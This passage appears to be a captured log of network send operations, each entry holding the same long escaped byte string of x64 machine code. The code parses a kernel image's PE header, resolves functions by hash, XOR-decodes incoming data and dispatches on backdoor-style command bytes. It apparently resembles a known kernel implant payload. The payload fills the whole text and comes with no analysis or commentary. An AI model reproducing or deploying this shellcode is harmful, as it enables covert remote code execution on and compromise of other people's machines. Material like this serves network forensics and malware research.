H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 19, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 20, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
